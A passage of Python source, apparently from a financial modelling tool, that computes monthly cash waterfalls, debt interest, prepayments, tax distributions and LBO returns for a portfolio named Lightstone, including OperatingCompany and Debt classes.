swap_item.build_swap_interest_payments(self.interestRates)
start_month = self.metadata['cashflow'].index.min()
end_month = self.metadata['cashflow'].index.max()
swap_item_interest_payment_df = swap_item.build_swap_payments_by_month(start_month, end_month)
# swap_item_interest_payment_df.to_csv(swap_item.instrumentID + "_swap_detail.csv")
pd.DataFrame(swap_item.swapRates).to_csv(swap_item.instrumentID + "_swap_raw_detail.csv")
total_swap_interest_payment_df = total_swap_interest_payment_df.append(swap_item_interest_payment_df)
swap_item_raw_detail_df = pd.DataFrame(data=swap_item.swapRates, columns=['date_fix_rate', 'date_start', 'date_end', 'notional', 'fix_rate', 'floating_rate', 'number_of_days', 'swap_per_day'])
swap_item_raw_detail_df['swap_instrument_id'] = swap_item.instrumentID
total_swap_detail_df = total_swap_detail_df.append(swap_item_raw_detail_df)
self.metadata['swap_payment'] = total_swap_interest_payment_df
self.metadata['swap_detail'] = total_swap_detail_df
pivot_swap_interest_payment_df = pd.pivot_table(total_swap_interest_payment_df, values='total_interest_payment', columns='instrument_id', index='month_end', aggfunc=np.sum)
pivot_swap_interest_payment_df.fillna(value={'total_interest_payment':0.0}, inplace=True)
pivot_swap_interest_payment_df['Swap - interest expense'] = - pivot_swap_interest_payment_df[list(pivot_swap_interest_payment_df.columns)].sum(axis=1)
pivot_swap_interest_payment_df = pivot_swap_interest_payment_df.loc[pivot_swap_interest_payment_df.index >= self.scenarioMaster.forecastStartMonth]
self.metadata['cashflow']['Swap - interest expense'] = pd.Series(pivot_swap_interest_payment_df['Swap - interest expense'])
""" step 4, build ptd related components """
opco = [item for item in self.capitalStructure if isinstance(item, OperatingCompany)][0]
entity_capex_df = opco.get_entity_capex()
entity_list = list(set(entity_capex_df.entity))
additional_capex_dict = {}
entity_capex_df['year'] = entity_capex_df.apply(lambda row: row['period'].year, axis=1)
for entity in entity_list:
additional_capex_dict[entity] = entity_capex_df.loc[entity_capex_df.entity == entity].groupby(['year'])['value'].agg(sum).to_dict()
year_range = list(range(self.metadata['cashflow'].index.min().year, self.metadata['cashflow'].index.max().year+1))
for year in year_range:
start_date = date(year, 1, 1)
end_date = date(year, 12, 31)
""" hardcoded for now """
total_oid = 5201004
total_dfc = 9535996
total_ebitda = self.metadata['cashflow'][start_date:end_date]['OpCo - ebitda'].sum()
# additional_capex_dict = {'Gavin':{2020:55145000, 2021:111111111}, .... }
ptd_schedule = self.__build_ptd(year, total_oid, total_ebitda, total_dfc, additional_capex_dict, total_interest_expense=None)
ptd_period_list = [date(year, 3, 31), date(year, 6, 30), date(year, 9, 30), date(year, 12, 31)]
for ptd_period in ptd_period_list:
self.metadata['cashflow'].at[ptd_period, 'TaxRegister - ptd'] = - ptd_schedule[ptd_period_list.index(ptd_period)]
""" step 5, do cash waterfall month over month staring the forecast phase """
cash_waterfall_forecast_months = self.scenarioMaster.forecastMonths
for forecast_month in cash_waterfall_forecast_months:
beginning_cash = self.metadata['cashflow'].loc[forecast_month]['Beginning Cash Balance']
if str(beginning_cash) == 'nan':
beginning_cash = 0.0
cashflow_for_period = beginning_cash
""" waterfall is ordered by level and sub level """
for index, waterfall_item in self.waterfall.iterrows():
""" 3 key configurable variables to determine how to react on the cash """
instrument = waterfall_item['instrument']
item = waterfall_item['item']
method = waterfall_item['method']
direction = waterfall_item['direction']
direction_sign = 1 if direction == 'inflow' else -1
""" OpCo items already set from initialization phase """
if instrument == 'OpCo':
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
if instrument == 'Revolver':
revolver_obj = [item for item in self.capitalStructure if isinstance(item, Revolver)][0]
if item == 'interest expense':
revolver_interest_expense = revolver_obj.calculate_interest_expense(forecast_month)
cashflow_for_period += revolver_interest_expense * direction_sign
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = revolver_interest_expense * direction_sign
if item in ['draw','repay']:
""" for now we use manual revolver adjustment """
""" revolver draw or repay balances will be set on the initialization phase """
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
continue
if instrument in ['Swap']:
if item == 'interest expense':
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
continue
if instrument == 'TaxRegister':
if item == 'ptd':
cashflow_item_value = self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()] if str(self.metadata['cashflow'].loc[forecast_month][instrument + " - " + item.lower()]) != 'nan' else 0.0
cashflow_for_period += cashflow_item_value
continue
if instrument in ['TLB', 'TLC']:
tl_obj = [item for item in self.capitalStructure if isinstance(item, FloatingDebt) and item.instrumentID == self.portfolio + " " + instrument][0]
if item == 'interest expense':
tl_interest_expense = tl_obj.calculate_interest_expense(forecast_month)
cashflow_for_period += tl_interest_expense * direction_sign
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = tl_interest_expense * direction_sign
if item == 'prepayment':
flag_prepayable = tl_obj.flagPrepayable
periodicity_months =tl_obj.periodicityMonths
prepayment = 0
if flag_prepayable and forecast_month.month % periodicity_months == 0:
min_cash_reserve = tl_obj.minCashReservePrepay
prepayment = max([0, cashflow_for_period - min_cash_reserve])
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = prepayment * direction_sign
tl_obj.prepay_debt(forecast_month, self.scenarioMaster.forecastStartMonth, prepayment)
else:
""" for debt which is not prepayable or not in periodicity, just present 0s for prepayment even with excess cash """
self.metadata['cashflow'].at[forecast_month, instrument + ' - ' + item.lower()] = 0.0
continue
cashflow_for_period += prepayment * direction_sign
next_month_end = dateUtils.get_one_month_later(forecast_month)
if next_month_end <= self.metadata['cashflow'].index.max():
self.metadata['cashflow'].at[next_month_end, 'Beginning Cash Balance'] = cashflow_for_period
revolver = [ item for item in self.capitalStructure if isinstance(item, Revolver)][0]
# pd.DataFrame.from_dict(revolver.interestPayments, orient='index').to_csv("revolver_balances.csv")
tlb = [ item for item in self.capitalStructure if isinstance(item, FloatingDebt) and item.instrumentID == 'Lightstone TLB'][0]
tlb_df = pd.DataFrame.from_dict(tlb.principalBalances, columns=['balance'], orient='index')
tlb_df['upsize'] = pd.Series(tlb.upsizes)
tlb_df['prepay'] = pd.Series(tlb.prepays)
tlb_df['margin'] = 0.0375
tlb_df['floating_rate'] = pd.Series(tlb.effectiveInterestRates)
tlb_df['floating_rate'] = tlb_df['floating_rate'] - tlb_df['margin']
tlb_df['interest_payments'] = pd.Series(tlb.interestPayments)
tlb_df = tlb_df.T
tlb_df.to_csv("tlb.csv")
tlc = [ item for item in self.capitalStructure if isinstance(item, FloatingDebt) and item.instrumentID == 'Lightstone TLC'][0]
tlc_df = pd.DataFrame.from_dict(tlc.principalBalances, columns=['balance'], orient='index')
tlc_df['upsize'] = pd.Series(tlc.upsizes)
tlc_df['prepay'] = pd.Series(tlc.prepays)
tlc_df['margin'] = 0.0375
tlc_df['floating_rate'] = pd.Series(tlc.effectiveInterestRates)
tlc_df['floating_rate'] = tlc_df['floating_rate'] - tlc_df['margin']
tlc_df['interest_payments'] = pd.Series(tlc.interestPayments)
tlc_df = tlc_df.T
# tlc_df.to_csv("tlc.csv")
""" when we do lbo analysis, we usually do not need too much customizations, we only need assumptions """
def analyze_leverage_buyout(self):
""" step 1, get beginning cash if available """
cash_balances_df = dbLiquidity.get_cash_balance(self.portfolio, self.scenarioMaster.forecastStartMonth)
if len(cash_balances_df) > 0:
self.__build_beginning_cash(cash_balances_df)
else:
self.metadata['cashflow']['Beginning Cash Balance'] = 0.0
""" step 2, follow the order of cash waterfall """
monthly_cashflow = 0.0
for index, row in self.metadata['cashflow'].iterrows():
for cash_item_title in self.metadata['cashflow'].columns:
if cash_item_title == 'Beginning Cash Balance':
if index.year == self.scenarioMaster.startYear and index.month == 1:
monthly_cashflow = row[cash_item_title]
else:
self.metadata['cashflow'].at[index, cash_item_title] = monthly_cashflow
continue
object = cash_item_title.split(" - ")[0]
object_item = cash_item_title.split(" - ")[1]
if object == 'OpCo':
monthly_cashflow += row[cash_item_title]
if object == 'TLB':
tlb_obj = [item for item in self.capitalStructure if isinstance(item, Debt) and item.instrumentID == self.portfolio + " TLB"][0]
if object_item.lower() == 'interest expense':
required_interest_payment = tlb_obj.calculate_interest_expense(index)
self.metadata['cashflow'].at[index, cash_item_title] = -required_interest_payment
monthly_cashflow -= required_interest_payment
if object_item.lower() == 'amortization':
required_amort = tlb_obj.calculate_amortization(index)
self.metadata['cashflow'].at[index, cash_item_title] = -required_amort
monthly_cashflow -= required_amort
if object_item.lower() == 'prepayment':
available_cash = monthly_cashflow
prepayment = tlb_obj.calculate_prepayment(index, available_cash)
self.metadata['cashflow'].at[index, cash_item_title] = -prepayment
monthly_cashflow -= prepayment
if object == 'Equity':
equity_obj = [item for item in self.capitalStructure if isinstance(item, Equity)][0]
if object_item.lower() == 'sweep':
equity_sweep = equity_obj.calculate_equity_sweep(index, monthly_cashflow)
self.metadata['cashflow'].at[index, cash_item_title] = -equity_sweep
monthly_cashflow -= equity_sweep
""" exit phase analysis """
equity_obj = [item for item in self.capitalStructure if isinstance(item, Equity)][0]
exit_time = equity_obj.exitTime
tl_objects = [item for item in self.capitalStructure if isinstance(item, Debt)]
ending_debt_balances = sum([item.principalBalances[exit_time] for item in tl_objects])
tlb_object = tl_objects[0]
last_tweleve_months_start_date = dateUtils.get_months_shift_date(exit_time, -11)
last_tweleve_months_ebitda = self.metadata['cashflow'].loc[last_tweleve_months_start_date:exit_time]['OpCo - ebitda'].sum()
equity_exit_value = equity_obj.calculate_exit_value(last_tweleve_months_ebitda)
equity_annual_cashflow_list, irr, moic = equity_obj.calculate_irr_and_moic(self.metadata['cashflow'][['Equity - sweep']], equity_exit_value - ending_debt_balances)
print (irr)
print ("first")
print ([item/1000000.0 for item in equity_annual_cashflow_list], irr, moic)
print ("------------------------------------------------")
return equity_annual_cashflow_list, irr, moic
""" A key function here to solve for a purchase price with targetted IRR """
def solve_purchase_price_by_irr(self, targeted_irr):
data = (targeted_irr, self)
equity_obj = [item for item in self.capitalStructure if isinstance(item, Equity)][0]
purchase_price = 1
result_purchase_price = fsolve(self.solver_purchase_price, x0=purchase_price, args=data, factor=100, xtol=0.000001)
print ("result: ", str(result_purchase_price[0]))
""" solver for purchase price """
@staticmethod
def solver_purchase_price(purchase_price, *args):
targeted_irr, liquidity_obj = args
""" exit phase analysis """
equity_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Equity)][0]
""" reset equity purchase price! """
equity_obj.purchasePrice = purchase_price[0]
tl_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Debt)][0]
tl_obj.initialBalance = purchase_price[0] * equity_obj.debtPercentage
tl_obj.prepays = {}
tl_obj.amortizations = {}
tl_obj.upsizes = {}
tl_obj.build_principal_balances()
""" step 1, get beginning cash if available """
cash_balances_df = dbLiquidity.get_cash_balance(liquidity_obj.portfolio, liquidity_obj.scenarioMaster.forecastStartMonth)
if len(cash_balances_df) > 0:
liquidity_obj.__build_beginning_cash(cash_balances_df)
else:
liquidity_obj.metadata['cashflow']['Beginning Cash Balance'] = 0.0
""" step 2, follow the order of cash waterfall """
monthly_cashflow = 0.0
for index, row in liquidity_obj.metadata['cashflow'].iterrows():
for cash_item_title in liquidity_obj.metadata['cashflow'].columns:
if cash_item_title == 'Beginning Cash Balance':
if index.year == liquidity_obj.scenarioMaster.startYear and index.month == 1:
monthly_cashflow = row[cash_item_title]
else:
liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = monthly_cashflow
continue
object = cash_item_title.split(" - ")[0]
object_item = cash_item_title.split(" - ")[1]
if object == 'OpCo':
monthly_cashflow += row[cash_item_title]
if object == 'TLB':
tlb_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Debt) and item.instrumentID == liquidity_obj.portfolio + " TLB"][0]
if object_item.lower() == 'interest expense':
required_interest_payment = tlb_obj.calculate_interest_expense(index)
liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -required_interest_payment
monthly_cashflow -= required_interest_payment
if object_item.lower() == 'amortization':
required_amort = tlb_obj.calculate_amortization(index)
liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -required_amort
monthly_cashflow -= required_amort
if object_item.lower() == 'prepayment':
available_cash = monthly_cashflow
prepayment = tlb_obj.calculate_prepayment(index, available_cash)
liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -prepayment
monthly_cashflow -= prepayment
if object == 'Equity':
equity_obj = [item for item in liquidity_obj.capitalStructure if isinstance(item, Equity)][0]
if object_item.lower() == 'sweep':
equity_sweep = equity_obj.calculate_equity_sweep(index, monthly_cashflow)
liquidity_obj.metadata['cashflow'].at[index, cash_item_title] = -equity_sweep
monthly_cashflow -= equity_sweep
exit_time = equity_obj.exitTime
tl_objects = [item for item in liquidity_obj.capitalStructure if isinstance(item, Debt)]
ending_debt_balances = sum([item.principalBalances[exit_time] for item in tl_objects])
tlb_object = tl_objects[0]
last_tweleve_months_start_date = dateUtils.get_months_shift_date(exit_time, -11)
last_tweleve_months_ebitda = liquidity_obj.metadata['cashflow'].loc[last_tweleve_months_start_date:exit_time]['OpCo - ebitda'].sum()
equity_exit_value = equity_obj.calculate_exit_value(last_tweleve_months_ebitda)
equity_annual_cashflow_list, irr, moic = equity_obj.calculate_irr_and_moic(liquidity_obj.metadata['cashflow'][['Equity - sweep']], equity_exit_value - ending_debt_balances)
print (purchase_price[0], purchase_price[0] * equity_obj.debtPercentage, [item/1000000 for item in equity_annual_cashflow_list], irr, targeted_irr - irr)
# df = liquidity_obj.metadata['cashflow'].copy()
# global a
# df['tlb_balance'] = pd.Series(tlb_object.principalBalances)
# df.to_csv(str(a) + ".csv")
# a+=1
return targeted_irr - irr
def __build_beginning_cash(self, cash_balances_df):
if len(cash_balances_df) > 0:
cash_balances_df['begin_date'] = cash_balances_df.apply(lambda row: dateUtils.get_cash_balance_begin_date(row['as_of_date']), axis=1)
for index, row in self.metadata['cashflow'].iterrows():
if len(cash_balances_df.loc[cash_balances_df.begin_date == index]) > 0:
self.metadata['cashflow'].at[index, 'Beginning Cash Balance'] = cash_balances_df.loc[cash_balances_df.begin_date == index].iloc[0]['balance']
def __initializ_fixed_asset_depreciation(self):
asset_df = dbLiquidity.get_asset_depreciation(self.portfolio)
entity_list = list(set(list(asset_df.entity)))
fixed_assets_obj_list = []
for entity in entity_list:
entity_asset_df = asset_df.loc[asset_df.entity==entity]
entity_name = entity
depreciation_method = entity_asset_df.iloc[0]['depreciation_method']
depreciation_term = entity_asset_df.iloc[0]['depreciation_term']
in_service_year = entity_asset_df.iloc[0]['in_service_year']
initial_purchase_price = entity_asset_df.loc[entity_asset_df.type == 'Purchase Price'].iloc[0]['value']
capex_df = entity_asset_df[entity_asset_df.type=='Capex']
grouped_capex_df = capex_df.groupby('in_service_year')['value'].sum()
capex_dict = grouped_capex_df.to_dict()
depreciation_adjustment_df = entity_asset_df[entity_asset_df.type.isin(['Disposal'])]
grouped_depreciation_adjustment_df = depreciation_adjustment_df.groupby('in_service_year')['value'].sum()
depreciation_adjustment_dict = grouped_depreciation_adjustment_df.to_dict()
fixed_asset_obj = FixedAsset(self.portfolio, entity_name, depreciation_method, depreciation_term, in_service_year, initial_purchase_price, capex=capex_dict, depreciation_adjustment=depreciation_adjustment_dict)
fixed_assets_obj_list.append(fixed_asset_obj)
return fixed_assets_obj_list
""" build up of PTD is differantiated between different portfolios, so this function has to provide different implementation """
def __build_ptd(self, year, total_oid, total_ebitda, total_dfc, additional_capex_dict, total_interest_expense=None):
""" step 1, get self tax register for the information like rate and split """
tax_register_list = [item for item in self.capitalStructure if isinstance(item, TaxRegister)]
fixed_assets_obj_list = self.fixedAssets
if self.portfolio == 'Lightstone':
tax_register = tax_register_list[0]
tax_register.get_paid_tax_from_db(self.scenarioMaster.forecastStartMonth)
# year = 2020
# total_interest_expense = 112547000
# total_oid = 5201000
# total_ebitda = 214107000
# total_dfc = 9536000
# additional_capex_dict = {'Gavin':{2020:55145000, 2021:111111111}, .... }
total_tax_depreciation = 0
for fixed_asset in fixed_assets_obj_list:
additional_capex = additional_capex_dict[fixed_asset.entityName] if fixed_asset.entityName in additional_capex_dict else {}
total_tax_depreciation += fixed_asset.calcualte_tax_depreciation(additional_capex, year)
ptd_schedule = tax_register.calculate_tax_payment(year, total_oid, total_ebitda, total_dfc, total_tax_depreciation, total_interest_expense)
return ptd_schedule
def get_financials(self):
operating_company = [item for item in self.capitalStructure if isinstance(item, OperatingCompany)][0]
return operating_company.get_financials()
def output_liquidity_results(self):
monthly_list = self.metadata['cashflow'].index.tolist()
financials_df = self.get_financials()
rw_headers_df = self.get_output_row_headers_fromdb()
""" step 1, get the ebitda related fslis """
default_row_header = rw_headers_df.sort_values(by='order')['header'].tolist()
financials_df = financials_df.loc[(financials_df.period.isin(monthly_list)) & (financials_df.fsli.isin(default_row_header))]
merged_financials_df = pd.merge(financials_df, rw_headers_df, how='left', left_on='fsli', right_on = 'header')
merged_financials_df['display_value'] = merged_financials_df['value'] * merged_financials_df['display_sign']
merged_financials_df = merged_financials_df[['fsli','period','display_value']]
annual_financials_df = merged_financials_df.copy()
annual_financials_df['year'] = annual_financials_df.apply(lambda row: row['period'].year, axis=1)
pivot_financials_df = pd.pivot_table(merged_financials_df, index='fsli', values='display_value', columns='period', aggfunc='sum')
pivot_financials_df.fillna(0.0, inplace=True)
pivot_financials_df = pivot_financials_df.reindex(default_row_header)
pivot_annual_financials_df = pd.pivot_table(annual_financials_df, index='fsli', values='display_value', columns='year', aggfunc='sum')
pivot_annual_financials_df.fillna(0.0, inplace=True)
pivot_annual_financials_df = pivot_annual_financials_df.reindex(default_row_header)
# pivot_annual_financials_df.to_csv("pivot_annual_financials_df.csv")
monthly_output_result_datarows = [['Financials $(mm)'] + [dateUtils.get_year_month_header(period_month) for period_month in monthly_list]]
monthly_output_result_datarows = monthly_output_result_datarows + pivot_financials_df.reset_index().values.tolist()
""" step 2, get the liquidity related fslis """
cashflow_df = self.metadata['cashflow']
cashflow_df.fillna(0.0, inplace=True)
for column in cashflow_df.columns:
cashflow_df[column] = cashflow_df[column] * 0.000001
beginning_cash_datarow = cashflow_df['Beginning Cash Balance'].tolist()
beginning_cash_datarow = ['Beginning Cash Balance'] + beginning_cash_datarow
monthly_output_result_datarows.append([])
monthly_output_result_datarows.append(beginning_cash_datarow)
order_of_capital_component = ['OpCo', 'Revolver', 'TLB', 'TLC', 'Swap', 'TaxRegister', 'Equity']
for capital_component in order_of_capital_component:
monthly_output_result_datarows.append([capital_component])
for column in cashflow_df.columns:
if capital_component in column:
capital_component_sub_item = column.split(" - ")[1]
capital_component_sub_item_datarow = cashflow_df[column].values.tolist()
monthly_output_result_datarows.append([capital_component_sub_item] + capital_component_sub_item_datarow)
monthly_output_result_datarows.append([])
# monthly_output_result_datarows_df = pd.DataFrame(monthly_output_result_datarows)
#
# monthly_output_result_datarows_df.to_csv("monthly_output_result_datarows_df.csv")
start_year = min(monthly_list).year
end_year = max(monthly_list).year
year_range = list(range(start_year, end_year+1))
annual_output_result_datarows = [['Financials $(mm)'] + year_range]
annual_output_result_datarows = annual_output_result_datarows + pivot_annual_financials_df.reset_index().values.tolist()
annual_output_result_datarows.append([])
annual_begining_cash_balance_datarow = ['Beginning Cash Balance']
for year in year_range:
beginning_cash = cashflow_df.loc[date(year,1,31)]['Beginning Cash Balance']
annual_begining_cash_balance_datarow.append(beginning_cash)
annual_output_result_datarows.append(annual_begining_cash_balance_datarow)
for capital_component in order_of_capital_component:
annual_output_result_datarows.append([capital_component])
for column in cashflow_df.columns:
if capital_component in column:
capital_component_sub_item = column.split(" - ")[1]
capital_component_sub_item_datarow = []
for year in year_range:
sub_item_value = cashflow_df.loc[date(year,1,31):date(year,12,31)][column].sum()
sub_item_value = 0.0 if str(sub_item_value) == 'nan' else sub_item_value
capital_component_sub_item_datarow.append(sub_item_value)
annual_output_result_datarows.append([capital_component_sub_item] + capital_component_sub_item_datarow)
annual_output_result_datarows.append([])
return annual_output_result_datarows, monthly_output_result_datarows
def get_output_row_headers_fromdb(self):
rw_headers_df = dbLiquidity.get_rw_headers()
return rw_headers_df
class OperatingCompany:
def __init__(self,
portfolio,
financials_scenario='',
financials_version='',
financials_table='',
ebitda={},
capex={},
working_capital={},
other_cash_use={}):
self.portfolio = portfolio
self.financialsScenario = financials_scenario
self.financialsVersion = financials_version
self.financialsTable = financials_table
self.ebitda = ebitda
self.capex = capex
if financials_scenario != '' and financials_version != '':
financials_df = self.get_financials()
self.ebitda = financials_df.loc[financials_df.fsli=='EBITDA'].groupby(['fsli','period']).sum().reset_index()[['period','value']].set_index('period')['value'].to_dict()
self.capex = financials_df.loc[financials_df.fsli=='Total Capex'].groupby(['fsli','period']).sum().reset_index()[['period','value']].set_index('period')['value'].to_dict()
if 'Total Capex' not in financials_df.fsli.tolist():
self.capex = financials_df.loc[financials_df.fsli=='Capex'].groupby(['fsli','period']).sum().reset_index()[['period','value']].set_index('period')['value'].to_dict()
# """ flip the sign of the capex items """
# for key, value in self.capex.items():
# self.capex[key] = -value
self.workingCapital = working_capital
self.otherCashUse = other_cash_use
def get_financials(self):
# method to call database and get financials information for EBITDA and Capex
financials_df = dbLiquidity.get_financials(self.portfolio, self.financialsScenario, self.financialsVersion, self.financialsTable)
return financials_df
def get_entity_capex(self):
financials_df = self.get_financials()
entity_capex_df = financials_df.loc[financials_df.fsli=='Total Capex']
if 'Total Capex' not in financials_df.fsli.tolist():
entity_capex_df = financials_df.loc[financials_df.fsli=='Capex']
return entity_capex_df
def build_cfo(self):
cfo = {}
for key in self.ebitda:
ebitda = self.ebitda[key]
capex = 0
if key in self.capex:
capex = self.capex[key]
cfo_dollar_amount = ebitda - capex
cfo[key] = {'EBITDA': ebitda, 'CAPEX': capex, 'CFO': cfo_dollar_amount}
return cfo
class Debt:
def __init__(self,
instrument_id,
issue_date,
maturity_date,
term,
initial_balance,
interest_start_date,
amort_start_date,
periodicity_months,
annual_scheduled_amort,
min_cash_reserve_prepay,
day_count='30/360',
sweep_percent=1,
dsra_months=6,
oids=[], # a list of OID objects
dfcs=[], # a list of DFC objects
oid_payments={},
dfc_payments={},
upsizes={},
prepays={},
effective_interest_rates={},
interest_payments={},
required_dsras={},
dsra_cash_movement={},
amortizations={},
principal_balances={},
flag_prepayable=True,
flag_historicals=True,
flag_dsra_fund_by_lc=True):
self.instrumentID = instrument_id # name of this debt
self.issueDate = issue_date
self.maturityDate = maturity_date
self.term = term
self.initialBalance = initial_balance
self.interestStartDate = interest_start_date
self.amortStartDate = amort_start_date
self.periodicityMonths = periodicity_months
self.dsraMonths = dsra_months
self.annualScheduledAmort = annual_scheduled_amort
self.minCashReservePrepay = min_cash_reserve_prepay
self.dayCount = day_count
self.sweepPercent = sweep_percent
self.effectiveInterestRates = effective_interest_rates
self.upsizes = upsizes
self.prepays = prepays
self.oids = oids
self.dfcs = dfcs
self.oidPayments = oid_payments
self.dfcPayments = dfc_payments
self.interestPayments = interest_payments
self.requiredDSRAs = required_dsras
self.dsraCashMovement = dsra_cash_movement
self.amortizations = amortizations
self.principalBalances = principal_balances
self.flagPrepayable = flag_prepayable
self.flagDsraFundByLc = flag_dsra_fund_by_lc
self.flagHistoricals = flag_historicals
def build_period_list(self):
period_list = []
if self.issueDate == date(self.issueDate.year, self.issueDate.month, monthrange(self.issueDate.year, self.issueDate.month)[-1]):
self.issueDate = self.issueDate + timedelta(days=1)
month_end = date(self.issueDate.year, self.issueDate.month, monthrange(self.issueDate.year, self.issueDate.month)[-1])
while month_end < self.maturityDate:
number_of_days_for_period = month_end.day
if month_end.year == self.issueDate.year and month_end.month == self.issueDate.month:
number_of_days_for_period = (month_end.day - self.issueDate.day) + 1
period_list.append([month_end, number_of_days_for_period])
else:
period_list.append([month_end, number_of_days_for_period])
month_end = month_end + timedelta(days=1)
month_end = date(month_end.year, month_end.month, monthrange(month_end.year, month_end.month)[-1])
if month_end >= self.maturityDate and month_end.year == self.maturityDate.year and month_end.month == self.maturityDate.month:
number_of_days_for_period = self.maturityDate.day
period_list.append([month_end, number_of_days_for_period])
return period_list
def build_principal_balances(self):
period_list = self.build_period_list()
for period_item in period_list:
month_end = period_item[0]
self.principalBalances[month_end] = 0.0
balance = self.initialBalance
upsize_balance = sum([self.upsizes[month] for month in self.upsizes if month <= month_end])
prepayment_balance = sum([self.prepays[month] for month in self.prepays if month <= month_end])
amortization_balance = sum([self.amortizations[month] for month in self.amortizations if month <= month_end])
balance += upsize_balance
balance -= prepayment_balance
balance -= amortization_balance
self.principalBalances[month_end] = balance
return self.principalBalances
def build_interest_payments(self, forecast_start):
period_list = self.build_period_list()
period_list = [item for item in period_list if item[0] >= forecast_start]
for period_item in period_list:
month_end = period_item[0]
effective_interest_rate = self.effectiveInterestRates[month_end]
balance = self.initialBalance
upsize_balance = sum([self.upsizes[month] for month in self.upsizes if month <= month_end])
prepayment_balance = sum([self.prepays[month] for month in self.prepays if month <= month_end])
balance += upsize_balance
balance -= prepayment_balance
self.interestPayments[month_end] = balance * effective_interest_rate * 30 / 360
if self.dayCount == 'day/365':
self.interestPayments[month_end] = balance * effective_interest_rate * month_end.day / 365
return self.interestPayments
def prepay_debt(self, forecast_month, forecast_start, prepayment):
if forecast_month in self.prepays:
self.prepays[forecast_month] = self.prepays[forecast_month] + prepayment
else:
self.prepays[forecast_month] = prepayment
self.build_principal_balances()
self.build_dsras(forecast_start)
def calculate_interest_expense(self, forecast_month):
balance = self.principalBalances[forecast_month]
effective_interest_rate = self.effectiveInterestRates[forecast_month]
number_of_days = forecast_month.day
interest_expense = balance * effective_interest_rate * number_of_days / 365
if self.dayCount == 'day/365':
interest_expense = balance * effective_interest_rate * number_of_days / 365
if self.dayCount == '30/360':
interest_expense = balance * effective_interest_rate * 30 / 360
number_of_days = 30
self.interestPayments[forecast_month] = interest_expense
return interest_expense
def calculate_amortization(self, forecast_month):
balance = self.initialBalance
annual_amort_amount = balance * self.annualScheduledAmort
periodicity = self.periodicityMonths
if forecast_month.month % periodicity != 0:
return 0
else:
amortization = annual_amort_amount / 12.0 * periodicity
if amortization > self.principalBalances[forecast_month]:
amortization = self.principalBalances[forecast_month]
self.amortizations[forecast_month] = amortization
self.build_principal_balances()
return amortization
""" method to calculate term loan prepayment based on available_cash """
def calculate_prepayment(self, forecast_month, available_cash):
if self.flagPrepayable == False:
""" if a debt is not prepayable, then return 0 """
self.prepays[forecast_month] = 0.0
return 0.0
if forecast_month.month % self.periodicityMonths != 0:
""" if period is not on periodicity, then return 0 """
self.prepays[forecast_month] = 0.0
return 0.0
prepay = available_cash if available_cash > 0 else 0.0
current_balance = self.principalBalances[forecast_month]
if prepay > current_balance:
prepay = current_balance
self.prepays[forecast_month] = prepay
self.build_principal_balances()
return prepay
# """ method to build term loan prepayment for lbo analysis """
# """ not designed for the liquidity purpose """
# def build_prepayments(self, forecast_start_month, available_cash):
# period_list = self.build_period_list()
# for period_month in period_list:
# if period_month[0] >= forecast_start_month:
# if period_month[0].month % self.period_month == 0:
# period_start = date(period_month[0].year, period_month[0] - self.periodicityMonths + 1, monthrange(period_month[0].year, period_month[0] - self.periodicityMonths + 1)[1])
# period_end = period_month[0]
# beginning_debt_balance = self.principalBalances[period_start]
# effective_interest_rates = {key:self.effectiveInterestRates[key] for key in self.effectiveInterestRates if key >= period_start and key <= period_end}
# available_cash = {key:available_cash[key] for key in available_cash if key >= period_start and key <= period_end}
def build_dsras(self, start_date):
period_list = self.build_period_list()
for period_item in period_list:
month_end = period_item[0]
if month_end >= start_date:
# quarterly : mod(3)
# semiannually : mod(6)
if month_end.month % self.periodicityMonths == 0:
start_debt_balance = self.initialBalance \
- sum([self.prepays[month] for month in self.prepays if month <= month_end]) \
+ sum([self.upsizes[month] for month in self.upsizes if month <= month_end])
next_six_months_list = []
next_month = month_end
max_number_of_months = 1
required_interest = 0.0
while max_number_of_months <= self.dsraMonths:
next_month = next_month + timedelta(days=1)
next_month = date(next_month.year, next_month.month, monthrange(next_month.year, next_month.month)[1])
next_six_months_list.append(next_month)
interest_month = next_month
""" if month exceeds the maximum available forecast period then use the last month """
if next_month > self.maturityDate:
interest_month = self.maturityDate
required_interest += start_debt_balance * self.effectiveInterestRates[interest_month] * 30 / 360
if self.dayCount == 'day/365':
required_interest += start_debt_balance * self.effectiveInterestRates[interest_month] * next_month.day / 365
max_number_of_months += 1
self.requiredDSRAs[month_end] = required_interest
""" add logic to check if fundbylc then leave cash movement as 0 """
if self.flagDsraFundByLc:
self.dsraCashMovement[month_end] = 0.0
def set_historical_amortization(self, forecast_start_month, debt_activity_df=None):
if self.flagHistoricals:
if debt_activity_df is None:
debt_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
amortizations_df = debt_activity_df.loc[(debt_activity_df.instrument_id == self.instrumentID) & (debt_activity_df.activity_type == 'amortization') & (debt_activity_df.date < forecast_start_month)].copy()
amortizations_df['value'] = amortizations_df['value']
self.amortizations = amortizations_df.set_index('date')['value'].to_dict()
def set_historical_size_change(self, forecast_start_month, debt_activity_df=None):
if self.flagHistoricals:
if debt_activity_df is None:
debt_activity_df = dbLiquidity.get_debt_activity(self.instrumentID)
""" load debt upsize information """
upsizes_df = debt_activity_df.loc[(debt_activity_df.activity_type=='additional borrowing') & (debt_activity_df.date < forecast_start_month)][['date','value']].copy()
if len(upsizes_df) > 0:
